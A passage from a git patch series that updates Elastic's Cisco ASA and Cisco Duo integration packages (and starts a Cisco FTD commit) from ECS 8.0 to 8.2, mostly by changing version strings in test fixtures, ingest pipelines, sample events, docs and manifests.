index 1c6c150d809..31e59b1112c 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
@@ -15,7 +15,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -84,7 +84,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -154,7 +154,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -223,7 +223,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -299,7 +299,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -374,7 +374,7 @@
 "port": 12834
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -448,7 +448,7 @@
 "port": 4952
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -515,7 +515,7 @@
 "port": 25882
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -589,7 +589,7 @@
 "port": 52925
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -660,7 +660,7 @@
 "port": 45392
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -735,7 +735,7 @@
 "port": 4953
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -804,7 +804,7 @@
 "port": 52925
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -878,7 +878,7 @@
 "port": 52925
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -947,7 +947,7 @@
 "ip": "172.24.177.29"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "flow-expiration",
@@ -1010,7 +1010,7 @@
 "port": 10879
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1085,7 +1085,7 @@
 "port": 4954
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1150,7 +1150,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1211,7 +1211,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1280,7 +1280,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1349,7 +1349,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1418,7 +1418,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1487,7 +1487,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1556,7 +1556,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1625,7 +1625,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1694,7 +1694,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1763,7 +1763,7 @@
 "port": 25
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1832,7 +1832,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1899,7 +1899,7 @@
 "port": 137
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -1960,7 +1960,7 @@
 "port": 53
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2021,7 +2021,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2090,7 +2090,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2159,7 +2159,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2228,7 +2228,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2297,7 +2297,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2366,7 +2366,7 @@
 "port": 8111
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2435,7 +2435,7 @@
 "port": 8111
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2504,7 +2504,7 @@
 "port": 40443
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2573,7 +2573,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2643,7 +2643,7 @@
 "port": 2000
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "firewall-rule",
@@ -2716,7 +2716,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2787,7 +2787,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2859,7 +2859,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -2935,7 +2935,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3012,7 +3012,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3085,7 +3085,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3161,7 +3161,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3237,7 +3237,7 @@ "port": 5678 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3311,7 +3311,7 @@ "port": 5679 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3376,7 +3376,7 @@ "port": 5679 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3443,7 +3443,7 @@ "port": 5000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3519,7 +3519,7 @@ "port": 65000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3594,7 +3594,7 @@ "port": 65000 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3665,7 +3665,7 @@ "port": 1235 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -3741,7 +3741,7 @@ "port": 500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", 
@@ -3810,7 +3810,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3873,7 +3873,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3936,7 +3936,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -3999,7 +3999,7 @@ "ip": "192.168.99.47" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4062,7 +4062,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4125,7 +4125,7 @@ "ip": "192.168.99.57" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4188,7 +4188,7 @@ "ip": "192.168.1.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4251,7 +4251,7 @@ "ip": "192.168.1.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4317,7 +4317,7 @@ "port": 25 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4388,7 +4388,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4455,7 +4455,7 @@ "ip": "172.16.1.10" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4523,7 +4523,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4609,7 +4609,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4687,7 +4687,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", 
@@ -4755,7 +4755,7 @@ "ip": "192.168.2.1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4808,7 +4808,7 @@ "ip": "192.168.2.32" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4865,7 +4865,7 @@ "ip": "192.168.0.19" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -4951,7 +4951,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json index a38ed339fef..70d28ebd0dd 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json @@ -16,7 +16,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -83,7 +83,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -150,7 +150,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -217,7 +217,7 @@ "port": 5060 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 86cf3aff593..41434fe1725 100644 --- a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -7,7 +7,7 @@ processors: ignore_missing: true - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # # Parse the syslog header # 
diff --git a/packages/cisco_asa/data_stream/log/sample_event.json b/packages/cisco_asa/data_stream/log/sample_event.json index d3d84d26370..ce22227bf8d 100644 --- a/packages/cisco_asa/data_stream/log/sample_event.json +++ b/packages/cisco_asa/data_stream/log/sample_event.json @@ -24,7 +24,7 @@ "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_asa/docs/README.md b/packages/cisco_asa/docs/README.md index 13b50165510..ad91ac6ea0c 100644 --- a/packages/cisco_asa/docs/README.md +++ b/packages/cisco_asa/docs/README.md @@ -40,7 +40,7 @@ An example event for `log` looks as following: "port": 8256 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml index 89b78621844..05e08a7011a 100644 --- a/packages/cisco_asa/manifest.yml +++ b/packages/cisco_asa/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_asa title: Cisco ASA -version: 2.1.0 +version: 2.2.0 license: basic description: Collect logs from Cisco ASA with Elastic Agent. type: integration From ecc1bf2c109e6ebd3cca7b0d9a8c07f7246be978 Mon Sep 17 00:00:00 2001 
From: Taylor Swanson Date: Tue, 22 Feb 2022 15:06:18 -0600 Subject: [PATCH 11/23] Update cisco_duo to ECS 8.2 --- packages/cisco_duo/_dev/build/build.yml | 2 +- packages/cisco_duo/changelog.yml | 5 +++++ .../test/pipeline/test-admin.log-expected.json | 16 ++++++++-------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/admin/sample_event.json | 2 +- .../test/pipeline/test-auth.log-expected.json | 10 +++++----- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../cisco_duo/data_stream/auth/sample_event.json | 2 +- .../test-offline-enrollment.log-expected.json | 2 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../offline_enrollment/sample_event.json | 2 +- .../test/pipeline/test-summary.log-expected.json | 4 ++-- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/summary/sample_event.json | 2 +- .../pipeline/test-telephony.log-expected.json | 6 +++--- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/telephony/sample_event.json | 2 +- packages/cisco_duo/docs/README.md | 10 +++++----- packages/cisco_duo/manifest.yml | 2 +- 19 files changed, 41 insertions(+), 36 deletions(-) diff --git a/packages/cisco_duo/_dev/build/build.yml b/packages/cisco_duo/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_duo/_dev/build/build.yml +++ b/packages/cisco_duo/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index dda3244b325..92330f0dd24 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.0" + changes: + - description: Update to ECS 8.2 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "1.1.0" changes: - description: Update to ECS 8.0 
diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index f39238f796c..2a24c4b898e 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-07-20T11:41:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "activation_begin", @@ -30,7 +30,7 @@ { "@timestamp": "2021-07-20T11:44:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270944711Z", @@ -64,7 +64,7 @@ { "@timestamp": "2021-07-20T11:41:31.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "reason": "Starting activation process", @@ -93,7 +93,7 @@ { "@timestamp": "2021-07-20T11:44:09.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "activation_set_password", @@ -124,7 +124,7 @@ { "@timestamp": "2021-07-20T11:44:37.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270949599Z", @@ -169,7 +169,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270950423Z", @@ -208,7 +208,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270951256Z", @@ -251,7 +251,7 @@ { "@timestamp": "2021-07-20T11:45:11.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:47.270952063Z", diff --git a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml index 06c0a1fbea0..dcbe5374d7f 100644 
--- a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/admin/sample_event.json b/packages/cisco_duo/data_stream/admin/sample_event.json index b0540ca1730..6c70009ed53 100644 --- a/packages/cisco_duo/data_stream/admin/sample_event.json +++ b/packages/cisco_duo/data_stream/admin/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index c180bac4f72..e81ad507f86 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2020-02-13T18:56:20.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -110,7 +110,7 @@ { "@timestamp": "2021-07-23T07:21:51.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -232,7 +232,7 @@ { "@timestamp": "2021-08-12T09:14:23.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -354,7 +354,7 @@ { "@timestamp": "2021-07-23T07:20:54.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ @@ -473,7 +473,7 @@ { "@timestamp": "2021-07-23T07:19:34.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "ip": [ 
diff --git a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml index b7d397641ff..3e28b25521b 100644 --- a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/auth/sample_event.json b/packages/cisco_duo/data_stream/auth/sample_event.json index 78688714127..9ee539726e6 100644 --- a/packages/cisco_duo/data_stream/auth/sample_event.json +++ b/packages/cisco_duo/data_stream/auth/sample_event.json @@ -50,7 +50,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json index 93d2745e4a7..d0c1e3cf4f2 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2019-08-30T16:10:05.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.266080492Z", diff --git a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml index a25ff04d97e..755b4a4013c 100644 
--- a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json b/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json index 34474bbeb1e..9a3e3e3eca7 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/sample_event.json @@ -27,7 +27,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json index b8bcf7e25b4..612fc2e848f 100644 --- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json +++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-12-29T09:37:52.958306807Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.958306807Z", @@ -24,7 +24,7 @@ { "@timestamp": "2021-12-29T09:37:52.958309870Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:52.958309870Z", diff --git a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml index e2d04020cd3..c39d30bf54b 100644 --- a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: "@timestamp" value: "{{{_ingest.timestamp}}}" diff --git a/packages/cisco_duo/data_stream/summary/sample_event.json b/packages/cisco_duo/data_stream/summary/sample_event.json index d1b9379ca8f..21d5e9a30f1 100644 --- a/packages/cisco_duo/data_stream/summary/sample_event.json +++ b/packages/cisco_duo/data_stream/summary/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json index d7e3ceb4b07..1fec8c77f96 100644 --- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json +++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-07-22T12:59:30.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175332756Z", @@ -25,7 +25,7 @@ { "@timestamp": "2021-08-16T06:03:32.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175335209Z", @@ -47,7 +47,7 @@ { "@timestamp": "2020-03-20T15:38:12.000Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2021-12-29T09:37:53.175336142Z", diff --git a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml index 96950ead8f1..1dff8344ee3 100644 --- a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: "{{{_ingest.timestamp}}}" - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: event.kind value: event diff --git a/packages/cisco_duo/data_stream/telephony/sample_event.json b/packages/cisco_duo/data_stream/telephony/sample_event.json index ebb201a53b7..54bd428fb23 100644 --- a/packages/cisco_duo/data_stream/telephony/sample_event.json +++ b/packages/cisco_duo/data_stream/telephony/sample_event.json @@ -21,7 +21,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", diff --git a/packages/cisco_duo/docs/README.md b/packages/cisco_duo/docs/README.md index 34f240166d2..89386adadb1 100644 --- a/packages/cisco_duo/docs/README.md +++ b/packages/cisco_duo/docs/README.md @@ -54,7 +54,7 @@ An example event for `admin` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -211,7 +211,7 @@ An example event for `auth` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -440,7 +440,7 @@ An example event for `offline_enrollment` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -551,7 +551,7 @@ An example event for `summary` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", @@ -656,7 +656,7 @@ An example event for `telephony` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "7cefd7f8-53e3-4884-ab65-da99d71b166f", 
diff --git a/packages/cisco_duo/manifest.yml b/packages/cisco_duo/manifest.yml index 17295446441..16afbb571ca 100644 --- a/packages/cisco_duo/manifest.yml +++ b/packages/cisco_duo/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_duo title: Cisco Duo -version: 1.1.0 +version: 1.2.0 license: basic description: Collect logs from Cisco Duo with Elastic Agent. type: integration From 27ae1d3cd8155cc773462918540c046ed536f4c2 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 22 Feb 2022 15:26:52 -0600 Subject: [PATCH 12/23] Update cisco_ftd to ECS 8.2 --- packages/cisco_ftd/_dev/build/build.yml | 2 +- packages/cisco_ftd/changelog.yml | 5 + .../pipeline/test-asa-fix.log-expected.json | 10 +- .../test/pipeline/test-asa.log-expected.json | 536 +++++++++--------- .../test/pipeline/test-dns.log-expected.json | 42 +- .../pipeline/test-filtered.log-expected.json | 4 +- ...est-firepower-management.log-expected.json | 68 +-- .../pipeline/test-intrusion.log-expected.json | 8 +- .../test-no-type-id.log-expected.json | 8 +- .../pipeline/test-not-ip.log-expected.json | 6 +- .../pipeline/test-sample.log-expected.json | 142 ++--- ...test-security-connection.log-expected.json | 20 +- ...st-security-file-malware.log-expected.json | 20 +- ...st-security-malware-site.log-expected.json | 2 +- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_ftd/docs/README.md | 2 +- packages/cisco_ftd/manifest.yml | 2 +- 18 files changed, 443 